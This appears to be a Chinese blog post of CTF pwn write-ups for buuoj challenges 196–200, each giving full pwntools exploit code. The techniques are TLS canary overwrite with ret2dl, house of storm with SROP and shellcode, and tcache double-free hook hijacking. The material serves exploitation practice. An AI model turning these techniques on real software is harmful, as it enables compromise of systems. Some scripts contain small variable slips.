buuoj Pwn writeup 196-200

最新推荐文章于 2023-05-18 20:37:07 发布
原创 最新推荐文章于 2023-05-18 20:37:07 发布 · 483 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文讲述了利用栈溢出和canary值绕过的漏洞技巧,针对TLS结构体修改进行ROP攻击,以及如何通过Ret2dl技术实现程序控制。涉及的具体题目包括196gyctf_2020_bfnote的栈溢出与canary修复,197rctf_2019_babyheap的heap利用,以及199actf_2019_message的doublefree利用策略。

196 gyctf_2020_bfnote

在这里插入图片描述在这里插入图片描述第一个漏洞点是有栈溢出,但是开了canary。第二个漏洞点是虽然会检测v4大小,但是检测完时候我们还能再次输入,所以我们会有一次任意输入的机会。

我们的想法就是改掉TLS结构体中的canary,然后rop即可。

tls结构体

typedef struct  
{  
  void *tcb;        /* Pointer to the TCB.  Not necessarily the  
               thread descriptor used by libpthread.  */  
  dtv_t *dtv;  
  void *self;       /* Pointer to the thread descriptor.  */  
  int multiple_threads;  
  int gscope_flag;  
  uintptr_t sysinfo;  
  uintptr_t stack_guard;  
  uintptr_t pointer_guard;  
  ...  
} tcbhead_t;

里面的uintptr_t stack_guard就是我们的canary。

那这个结构体在哪?不同的libc不一样,对于这道题,2.23,在mmap的一块内存里面。所以我们就是申请一个大一点的chunk然后通过v4任意写改掉就好,剩下的就是一个栈溢出了。

又出了问题,问题是啥呢,在最后会在ebp上面去一个数字,这导致我们不能随便去覆盖它。因为不知道有啥用,覆盖了后面可能崩了。
在这里插入图片描述这个东西其实就是说main的返回地址稍微变了变,利用ebp,而我们不知道ebp地址,就无法猜到应该把v4覆盖成啥。
所以我们直接写上bss段地址,做一个栈迁移,但是因为本题的输出,用的是fwrite、fprintf,这使得我们很难找到合适的gadget来控制参数。并且,这些函数的空间花销很大。
所以最后整半天我们就用ret2dl。

一篇ret2dl博客

然后就通过ret2dl一顿操作,就好了。

exp

from pwn import *

r = remote("node3.buuoj.cn", 26764)
#r = process("./196")

elf = ELF("./196")
libc = ELF('./64/libc-2.23.so')
bss_start = 0x0804A060
gap = 0x500
stack_overflow = 'a' * (0x3e - 0xc + 0x8) + p64(bss_start + gap + 0x4)
 
r.recvuntil('Give your description : ')
r.send(stack_overflow)

r.recvuntil('Give your postscript : ')


fake_sym = p32(bss_start + gap + 0x4 * 4 + 0x8 - 0x80482C8) + p32(0) + p32(0) + p32(0x12)
fake_rel = p32(bss_start) + p32(0x7 + int((bss_start + gap + 0x4 * 4 + 0x8 + 0x8 + 0x8 - 0x080481D8) / 0x10) * 0x100)

r.send('\x00' * gap + p32(0x08048450) + p32(bss_start + gap + 0x4 * 4 + 0x8 * 2 - 0x080483D0) + p32(0) + p32(bss_start + gap + 0x4 * 4) + '/bin/sh\x00' + 'system\x00\x00' + fake_rel + fake_sym)

r.recvuntil('Give your notebook size : ')
r.send(str(0x20000))


r.recvuntil('Give your title size : ')
r.send(str(0xf7d22714 - 0xf7d01008 - 16))  #计算偏移

r.recvuntil('invalid ! please re-enter :\n')
r.send(str(4))

r.recvuntil('Give your title : ')
r.send('a')

r.recvuntil('Give your note : ')
r.send('aaaa')         #更改tls结构体中的canary为aaaa

r.interactive()

来一个最全的ret2博客

197 rctf_2019_babyheap

在这里插入图片描述
一道常规的heap

在这里插入图片描述开了沙箱,fastbin也被ban掉了。

add
在这里插入图片描述最多申请16个,大小很广,指针,大小都在bss,用的是calloc。

edit
在这里插入图片描述一个很明显的off by null。

delete
在这里插入图片描述删的干干净净。

show
在这里插入图片描述普普通通泄露函数。

所以其实跟之前那个0ctf_2018_heapstorm2很像,也是house of storm。

所以我们最后的思路还是那个,我们把setcontent+53的地址写入__free_hook,并在其之后0x10字节内存中写上两遍__free_hook+0x18的地址,最后把orw的shellcode写进去就好了。

exp

from pwn import *

context(log_level = 'debug', arch = 'amd64', os = 'linux')
elf = ELF("./197")
libc = ELF('./64/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]

menu = "Choice: \n"
def add(size):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Size: ")
	r.sendline(str(size))

def delete(index):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index: ")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index: ")
	r.sendline(str(index))

def edit(index, content):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index: ")
	r.sendline(str(index))
	r.recvuntil("Content: ")
	r.send(content)

def pwn():
	libc.address = 0
	add(0x80)#0
	add(0x68)#1
	add(0xf0)#2
	add(0x18)#3
	delete(0)
	payload = 'a'*0x60 + p64(0x100)
	edit(1, payload)
	delete(2)
	add(0x80)#0
	show(1)
	malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x58 - 0x10
	libc.address = malloc_hook - libc.sym['__malloc_hook']
	system = libc.sym['system']
	free_hook = libc.sym['__free_hook']
	set_context = libc.symbols['setcontext']
	success("libc_base:"+hex(libc.address))
	add(0x160)#2

	add(0x18)#4
	add(0x508)#5
	add(0x18)#6
	add(0x18)#7
	add(0x508)#8
	add(0x18)#9
	add(0x18)#10

	edit(5, 'a'*0x4f0+p64(0x500))
	delete(5)
	edit(4, 'a'*0x18)
	add(0x18)#5
	add(0x4d8)#11
	delete(5)
	delete(6)
	add(0x30)#5
	add(0x4e8)#6

	edit(8, 'a'*0x4f0+p64(0x500))
	delete(8)
	edit(7, 'a'*0x18)
	add(0x18)#8
	add(0x4d8)#12
	delete(8)
	delete(9)
	add(0x40)#8
	delete(6)
	add(0x4e8)#6
	delete(6)
	#pause()

	storage = free_hook
	fake_chunk = storage - 0x20
	payload = '\x00'*0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)
	edit(11, payload)
	payload = '\x00'*0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8) +p64(0) + p64(fake_chunk-0x18-5)
	edit(12, payload)
	add(0x48)#6
	sleep(0.5)

	new_addr =  free_hook &0xFFFFFFFFFFFFF000
	shellcode1 = '''
	xor rdi,rdi
	mov rsi,%d
	mov edx,0x1000

	mov eax,0
	syscall

	jmp rsi
	''' % new_addr
	edit(6, 'a'*0x10+p64(set_context+53)+p64(free_hook+0x18)*2+asm(shellcode1))

	frame = SigreturnFrame()
	frame.rsp = free_hook+0x10
	frame.rdi = new_addr
	frame.rsi = 0x1000
	frame.rdx = 7
	frame.rip = libc.sym['mprotect']
	edit(12, str(frame))
	delete(12)
	sleep(0.5)

	shellcode2 = '''
	mov rax, 0x67616c662f ;// /flag
	push rax

	mov rdi, rsp ;// /flag
	mov rsi, 0 ;// O_RDONLY
	xor rdx, rdx ;
	mov rax, 2 ;// SYS_open
	syscall

	mov rdi, rax ;// fd 
	mov rsi,rsp  ;
	mov rdx, 1024 ;// nbytes
	mov rax,0 ;// SYS_read
	syscall

	mov rdi, 1 ;// fd 
	mov rsi, rsp ;// buf
	mov rdx, rax ;// count 
	mov rax, 1 ;// SYS_write
	syscall

	mov rdi, 0 ;// error_code
	mov rax, 60
	syscall
	'''
	r.sendline(asm(shellcode2))

	r.interactive()

while True:
    r = remote("node3.buuoj.cn", 29594)
    try:
	pwn()
    except:
	r.close()

198 ciscn_2019_es_5

在这里插入图片描述在这里插入图片描述create里面size可以为0

在这里插入图片描述edit里面有realloc,看这realloc应该就小心点,有问题。

当size为0,则这个chunk会被free掉,但是堆指针没有从flist堆数组里移除,这就造成了uaf。利用这个uaf剩下的都是常规思路。

exp

#coding:utf8
from pwn import *

context.log_level = "debug"

r = remote('node3.buuoj.cn',27355)
libc = ELF('./64/libc-2.27.so')
 
def add(size,content):
   r.sendlineafter('Your choice:','1')
   r.sendlineafter('size?>',str(size))
   r.sendafter('content:',content)
 
def edit(index,content,have = True):
   r.sendlineafter('Your choice:','2')
   r.sendlineafter('Index:',str(index))
   if have:
      sh.sendafter('New content:',content)
 
def show(index):
   r.sendlineafter('Your choice:','3')
   r.sendlineafter('Index:',str(index))
 
def delete(index):
   r.sendlineafter('Your choice:','4')
   r.sendlineafter('Index:',str(index))
 
add(0x100,'a')
for i in range(7):
   add(0x100,'b')
for i in range(1,8):
   delete(i)

delete(0)
add(0x30,'a')

show(0)
r.recvuntil('Content: ')

malloc_hook = (u64(r.recv(6).ljust(8,'\x00')) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
one_gadget = libc_base + 0x10a38c

print 'libc_base=',hex(libc_base)


add(0,'') 
edit(1,'',False)
delete(1)
add(0x10,p64(malloc_hook))

add(0x10,p64(one_gadget))
r.sendlineafter('Your choice:','1')
 
r.interactive()

199 actf_2019_message

在这里插入图片描述add
在这里插入图片描述
delete
在这里插入图片描述edit
在这里插入图片描述
正常edit

就double free做就好了。

exp

from pwn import *

context.log_level = "debug"

r = remote('node3.buuoj.cn',27555)

elf = ELF('./199')
libc = ELF('./64/libc-2.27.so')

def add(size,content):
    r.sendlineafter(': ','1')
    r.sendlineafter(':',str(size))
    r.sendafter(':',content)

def delete(idx):
    r.sendlineafter(': ','2')
    r.sendlineafter(':',str(idx))

def edit(idx,content):
    r.sendlineafter(': ','3')
    r.sendlineafter(':',str(idx))
    r.sendafter(':',content)

def show(idx):
    r.sendlineafter(': ','4')
    r.sendlineafter(':',str(idx))

add(0x68,'\x09'*9) #0
add(0x450,'\x08'*8) #1
add(0x68,'/bin/sh\x00') #2
add(0x58,'\x07'*7) #3
delete(0)
delete(0)
delete(1)
    
add(0x68,p64(0x000602060))
add(0x68,'aaaa')
add(0x68,p64(0)*2+p64(0x460))
show(1)
libc_base = u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
    
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
delete(3)
delete(3)
add(0x58,p64(free_hook))
add(0x58,'aaaa')
add(0x58,p64(system_addr))
delete(2)
    
r.interactive()

200 ciscn_2019_sw_5

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
俩功能,add能输出内容,delete只能三次。
巧妙利用做double free就好了。

exp

#coding:utf8
from pwn import *
 
context.log_level = 'debug'

libc = ELF('./64/libc-2.27.so')

 
def add(title,content):
    r.sendlineafter('>>','1')
    r.sendafter('title:',title)
    r.sendafter('content:',content)
 
def delete(index):
    r.sendlineafter('>>','2')
    r.sendlineafter('index:',str(index))
 
def exp():
    add('t1','a')
    add('t2','b')
    fake_chunk = 'c'*0x8 + p64(0) + p64(0x61)
    add('t3',fake_chunk)
 
    #double free
    delete(0)
    delete(0)
    #攻击tcache bin表头
    add('\x1E\x70','a')
    r.recvuntil('\n')
    heap_base = u64(sh.recv(6).ljust(8,'\x00')) & (0xFFFFFFFFFFFFFF00)
    print 'heap_base=',hex(heap_base)
    add('t1',p64(heap_base + 0x280) + p64(heap_base + 0x268) + p64(0x101) + p64(heap_base + 0x270))
    payload = '\x00'*0x5A + p64(heap_base + 0x280)
    add('\xFF',payload) #5
    add('t1','a') #6
    delete(6)
    add('a'*0x8,'a'*0x10)
    r.recvuntil('a'*0x18)
    malloc_hook = (u64(sh.recv(6).ljust(8,'\x00'))& 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
    libc_base = malloc_hook - libc.sym['__malloc_hook']
    if libc_base >> 40 != 0x7F:
        raise Exception('error leak!')
    one_gadget = libc_base + 0x10a38c
    print 'libc_base=',hex(libc_base)
                                       
    add('a','a'*0x10 + p64(malloc_hook))
    add('a','a')
    add(p64(one_gadget),'\x00')
    #getshell
    r.sendlineafter('>>','1')
 
while True:
   try:
      global r
      r = remote('node3.buuoj.cn',25672)
      exp()
      r.interactive()
   except:
      r.close()
      print 'trying...'
buuoj Pwn writeup 81-85
yongbaoii的博客
02-26 301
81 pwnable_hacknote 保护 菜单堆 add 申请好的结构是下面这样的。 delete 没有清理干净,uaf。 print 直接调用那个puts函数,那直接想到如果把它改成system,content里面改成’/bin/sh’,这不就好了嘛? 先申请一个0x8的,再申请0x100的,再全部释放掉,就会导致fastbin里面会有三个chunk,再申请0x8,就可以对chunk0的第一层chunk进行任意写。 因为uaf,导致我们还是能使用print函数,但是print的那个chunk被清
GYCTF 2020-BFnote题目分析
Eagle_hwei的博客
03-14 976
BFnote的题目分析 2020-03-1408:28:02 by hawkJW 题目附件、ida文件及wp链接   自己太菜了,这道题里面包含的一些知识点和思路确实是以前完全没有接触过的。。。特别学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 可以看到,仅仅是没有开启PIE保护,其余基本上保护都开启了,保护还是比较严格的。 下面我们来粗...
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1787
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
buuoj helloword writeup
m0_73605862的博客
05-18 299
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 586
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 383
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 457
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 433
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 389
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 310
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 359
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 339
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
buuoj Pwn writeup 21-30
yongbaoii的博客
02-05 1329
21 ciscn_2019_ne_5 保护 这个地方的strcpy函数,一看就估摸着有问题。 他把src那块的东西复制到了dest 但是你会发现 dest那里 0x48 但是你是可以往src那里输入东西的。 一口气能输128个字节,那这就造成了溢出。 那再说怎么利用 这个地方首先要注意他这里没有/bin/sh,但是有sh 而且还非常隐蔽 所以呢咱们这边推荐之后/bin/sh跟sh的搜索都用ROPgadget。 非常的nice 然后程序里面本来就有system函数,然后就一把梭。 exp from p
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1509
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 290
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 292
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 494
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值